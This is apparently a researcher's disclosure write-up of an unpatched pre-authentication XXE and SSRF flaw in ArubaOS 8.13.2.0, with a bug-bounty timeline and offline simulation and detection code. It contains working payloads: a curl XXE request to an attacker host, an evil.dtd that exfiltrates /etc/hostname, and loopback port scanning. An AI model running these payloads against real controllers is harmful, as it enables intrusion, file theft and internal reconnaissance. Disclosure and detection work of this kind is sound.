Submission ID: 9e946ca3 — HPE Networking Product Public Program (Bugcrowd)
Status: Closed as “Not Applicable — theoretical / no valid PoC”
GitHub: github.com/JM00NJ/HPE-Aruba-AOS8-Vulnerabilities


Background

The subject of this writeup is a pre-authentication XML External Entity (XXE) injection vulnerability, with confirmed out-of-band (OOB) server-side request forgery (SSRF), in ArubaOS 8.13.2.0 LSR. The finding was submitted to the HPE Networking Bug Bounty Program on Bugcrowd on May 6, 2026.

Despite four independent pieces of evidence, including wire-level packet captures and the target's own daemon logs confirming server-side execution, the submission was closed as "theoretical / no valid PoC". Both Requests for Response (RaR) went unanswered. This writeup documents the vulnerability, the evidence, and the full timeline so the security community can evaluate it independently.


Target

Field            Value
Product          HPE Aruba Networking Wireless, AOS-8 Controller
Version          ArubaOS 8.13.2.0 LSR (Build 95415, compiled 2026-03-25)
Model            ArubaMC-VA-US
Endpoint         http://<device-ip>:32000/
Authentication   None required
CVSS v3.1        8.6 High (computed from the vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)
CWE              CWE-611: Improper Restriction of XML External Entity Reference

Vulnerability Description

Port 32000/TCP on ArubaOS 8.13.2.0 exposes an XML management interface (the default-xml-api AAA profile) that is reachable without any authentication. The XML parser behind it processes SYSTEM external entity declarations and resolves them against attacker-controlled hosts.

This enables:

  1. OOB SSRF — forcing the controller to initiate outbound HTTP connections to arbitrary hosts
  2. Internal network enumeration — using the controller as an unwilling proxy to probe internal services
  3. External DTD resolution — fetching and processing attacker-hosted DTD files

The exposure is not a misconfiguration: the AAA profile default-xml-api ships with no authentication configured.


Proof of Concept

Step 1 — Direct OOB SSRF

On the attacker host, start a listener:

nc -lvp 9999

Then send the payload to the controller:

curl -s -X POST "http://<target>:32000/" \
  -H "Content-Type: text/xml" \
  -d '<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://<attacker>:9999/test">]>
<aruba><opcode>&xxe;</opcode></aruba>'

Observed on the attacker listener (192.168.56.50 is the controller's address):

Connection received on 192.168.56.50 36048
GET /test HTTP/1.0
Host: <attacker-ip>:9999

Step 2 — External DTD Resolution

evil.dtd, hosted on the attacker HTTP server and referenced from the submitted document as an external parameter entity:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://<attacker>:9999/?d=%file;'>">
%eval;
%send;

Observed on the attacker HTTP server:

192.168.56.50 - [06/May/2026 02:33:43] "GET /evil.dtd HTTP/1.0" 200 -
192.168.56.50 - [06/May/2026 02:36:10] "GET /evil.dtd HTTP/1.0" 200 -
192.168.56.50 - [06/May/2026 02:38:17] "GET /evil.dtd HTTP/1.0" 200 -

These entries show the controller fetching the attacker-hosted DTD on three separate occasions. The second-stage callback to /?d= that would carry the contents of /etc/hostname does not appear among them, so what this step establishes is external DTD resolution, not file exfiltration.

Step 3 — Internal Port Scanning via SSRF

With the external entity pointed at http://127.0.0.1:<port>/, the controller returned <dialog>success</dialog> for probes of ports 22, 80, 443, 4343, 8080, 8443, 3306, 5432 and 9200, marking all nine as open, in under 30 seconds.
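To make the three steps reproducible without a controller in reach, the following added example (not code from the submission, and not HPE Aruba code) runs the same payload shapes through Python's xml.sax (expat) parser, which hands every SYSTEM entity to its EntityResolver just as the PoC relies on the controller's parser doing. A recording resolver stands in for the network, so nothing is actually contacted and the URLs the parser reached for are captured instead. The attacker host attacker.example, the canned DTD body, and the form of the Step 2 trigger document (the page shows evil.dtd but not the request that loads it) are this example's assumptions. The hardened branch is simply xml.sax's default with external general entities disabled, which is the generic CWE-611 mitigation, not a description of any ArubaOS fix.

```python
"""XXE -> OOB SSRF, simulated: the three PoC steps above run through
Python's xml.sax (expat) instead of the controller.

Added example, not code from the submission or from HPE Aruba. The
resolver below replaces the network: every URL the parser *would* have
fetched is recorded instead of contacted, so this runs offline."""
import io
import xml.sax
from xml.sax import handler, xmlreader

ATTACKER = b"http://attacker.example:9999"   # assumed placeholder host


def xxe_document(entity_decl, opcode_body):
    """Wrap an entity declaration and a reference in the PoC's <aruba> shape."""
    return (b'<?xml version="1.0"?><!DOCTYPE aruba [' + entity_decl +
            b']><aruba><opcode>' + opcode_body + b'</opcode></aruba>')


def step1_direct_oob():
    """Step 1: a general entity whose SYSTEM id is the attacker listener."""
    return xxe_document(b'<!ENTITY xxe SYSTEM "' + ATTACKER + b'/test">', b'&xxe;')


def step2_external_dtd():
    """Step 2 trigger (assumed form; the page shows only evil.dtd):
    a parameter entity pulls the attacker-hosted DTD into the DOCTYPE."""
    return xxe_document(b'<!ENTITY % dtd SYSTEM "' + ATTACKER + b'/evil.dtd"> %dtd;',
                        b'&send;')


def step3_probe(port):
    """Step 3: point the entity at a loopback port, one document per port."""
    return xxe_document(b'<!ENTITY probe SYSTEM "http://127.0.0.1:%d/">' % port,
                        b'&probe;')


class RecordingResolver(handler.EntityResolver):
    """Stand-in for the network. A real parser opens a socket here; this
    one logs the systemId and answers with canned bytes."""
    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        if systemId.endswith(".dtd"):
            # Simplified stand-in for evil.dtd: just declares the entity
            # the trigger references (the real one also reads a local file).
            body = b'<!ENTITY send "from-external-dtd">'
        else:
            body = b"<fetched/>"          # what the "listener" answers with
        src = xmlreader.InputSource(systemId)
        src.setByteStream(io.BytesIO(body))
        return src


class Collector(handler.ContentHandler):
    """Records the elements and text that end up in the parsed document."""
    def __init__(self):
        super().__init__()
        self.elements, self.text = [], []

    def startElement(self, name, attrs):
        self.elements.append(name)

    def characters(self, content):
        self.text.append(content)


def parse_and_record(xml_bytes, resolve_external):
    """Parse xml_bytes and return (urls requested, element names, text).

    resolve_external=True models the vulnerable parser on port 32000;
    False is xml.sax's default and the CWE-611 mitigation."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    resolver, collector = RecordingResolver(), Collector()
    parser.setEntityResolver(resolver)
    parser.setContentHandler(collector)
    src = xmlreader.InputSource()
    src.setByteStream(io.BytesIO(xml_bytes))
    parser.parse(src)
    return resolver.requested, collector.elements, "".join(collector.text).strip()


def scan_loopback(ports, resolve_external=True):
    """Step 3 as a loop: the loopback URLs the parser reached for."""
    urls = []
    for port in ports:
        urls += parse_and_record(step3_probe(port), resolve_external)[0]
    return urls


if __name__ == "__main__":
    for on in (True, False):
        tag = "external entities %s:" % ("ON " if on else "OFF")
        print(tag, parse_and_record(step1_direct_oob(), on))
        print(tag, parse_and_record(step2_external_dtd(), on))
        print(tag, scan_loopback([22, 80, 443, 4343], on))
```

With external entities enabled, every document produces exactly the outbound request the corresponding PoC step expects (the listener URL, the DTD URL, or one loopback URL per port), and the fetched content is spliced into the document; with them disabled the resolver is never consulted and the entity references are silently skipped, which is the behaviour a patched parser should show.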


Evidence

Evidence 1 — Wire-Level Packet Capture

obb_proof.pcapng shows a controller-initiated TCP connection to attacker infrastructure: the full three-way handshake followed by transmission of GET /test HTTP/1.0.

Evidence 2 — Target System’s Own Daemon Logs

May 13 07:31:56 |sshd| Bad protocol version identification 'GET / HTTP/1.0' from 127.0.0.1 port 33144

This entry can only be produced by a process on the controller itself opening a TCP connection to the local sshd and sending an HTTP request line in place of an SSH banner. A remote attacker cannot originate a connection to sshd that arrives from 127.0.0.1.

The triage response was never reconciled with this log entry.
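The sshd entry above is also a line a defender can alert on. The following added example, which is not part of the original submission, parses a few sshd log lines in the controller's format and flags HTTP request lines arriving at sshd from a loopback source, the signature of a local process being steered into port 22. The first sample line is the entry quoted above; the other three are constructed, and the category labels are the example's own.

```python
"""Detect SSRF-style probes of local sshd from the daemon's own log.

Added example, not from the submission. sshd logs a non-SSH client
banner as "Bad protocol version identification '<banner>'"; when the
banner is an HTTP request line and the source is loopback, something
on the box (here, the XML parser on port 32000) was coerced into
speaking HTTP to port 22."""
import ipaddress
import re

BAD_BANNER = re.compile(
    r"\|sshd\| Bad protocol version identification "
    r"'(?P<banner>[^']*)' from (?P<ip>[0-9a-fA-F:.]+) port (?P<port>\d+)")
HTTP_LINE = re.compile(r"^(GET|POST|HEAD|PUT|OPTIONS) \S+ HTTP/1\.[01]$")

SAMPLE_LOG = [
    # quoted from the page (Evidence 2)
    "May 13 07:31:56 |sshd| Bad protocol version identification "
    "'GET / HTTP/1.0' from 127.0.0.1 port 33144",
    # constructed: an internet scanner sending a TLS ClientHello to port 22
    "May 13 07:32:10 |sshd| Bad protocol version identification "
    "'\\x16\\x03\\x01' from 203.0.113.9 port 51022",
    # constructed: a remote client sending HTTP to port 22 (not SSRF)
    "May 13 07:33:02 |sshd| Bad protocol version identification "
    "'GET /robots.txt HTTP/1.1' from 198.51.100.4 port 40001",
    # constructed: unrelated sshd line
    "May 13 07:34:00 |sshd| Accepted publickey for admin from 192.168.56.10 port 5000",
]


def classify(line):
    """Return None for lines that are not bad-banner events, otherwise one
    of: garbage-banner, remote-http-to-sshd, loopback-http-to-sshd."""
    m = BAD_BANNER.search(line)
    if not m:
        return None
    banner, ip = m.group("banner"), m.group("ip")
    if not HTTP_LINE.match(banner):
        return "garbage-banner"
    if ipaddress.ip_address(ip).is_loopback:
        return "loopback-http-to-sshd"
    return "remote-http-to-sshd"


def ssrf_indicators(lines):
    """(syslog timestamp, source ip, source port, request line) per hit.

    Only loopback-sourced HTTP to sshd counts; remote HTTP to port 22 is
    noise from mis-pointed clients and scanners."""
    hits = []
    for line in lines:
        if classify(line) == "loopback-http-to-sshd":
            m = BAD_BANNER.search(line)
            hits.append((line[:15], m.group("ip"), int(m.group("port")),
                         m.group("banner")))
    return hits


if __name__ == "__main__":
    for hit in ssrf_indicators(SAMPLE_LOG):
        print("local process sent HTTP to sshd:", hit)
```

Run against the controller's syslog feed, the single hit is the 07:31:56 line; the TLS scanner and the remote HTTP client are classified but not raised, and an event from a loopback address with an HTTP verb is the one worth correlating with the port-32000 request log.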

Evidence 3 — External DTD Fetch Log

Three separate HTTP server log entries (02:33, 02:36, 02:38) confirming that the controller fetched attacker-hosted content.

Evidence 4 — Internal Port Scan

Nine internal ports reported open via <dialog>success</dialog> responses. A screenshot and the reproduction script were attached to the original submission.


Why The “Theoretical” Classification Is Incorrect

CWE-611 does not require in-band file exfiltration. An out-of-band callback that confirms external entity resolution from a pre-authentication endpoint is itself the vulnerability, as described in the OWASP XXE Prevention Cheat Sheet and PortSwigger's Blind XXE material.


Timeline

Date          Event
06 May 2026   Submission created (9e946ca3)
10 May 2026   Closed as N/A: "theoretical, no valid PoC"
11 May 2026   First RaR submitted
13 May 2026   sshd log evidence added
27 May 2026   First RaR expired, no response
28 May 2026   Second and final RaR submitted
31 May 2026   Researcher concluded the Bugcrowd disclosure process

Total: 25 days. Triage response to all evidence: none.


Disclosure Note

The program has determined that no vulnerability exists; no fix is forthcoming and no advisory will be published. The 60-day post-advisory window does not apply to findings the vendor has declined to acknowledge. This writeup is published for independent community evaluation.

Vesqer / JM00NJ — netacoding.com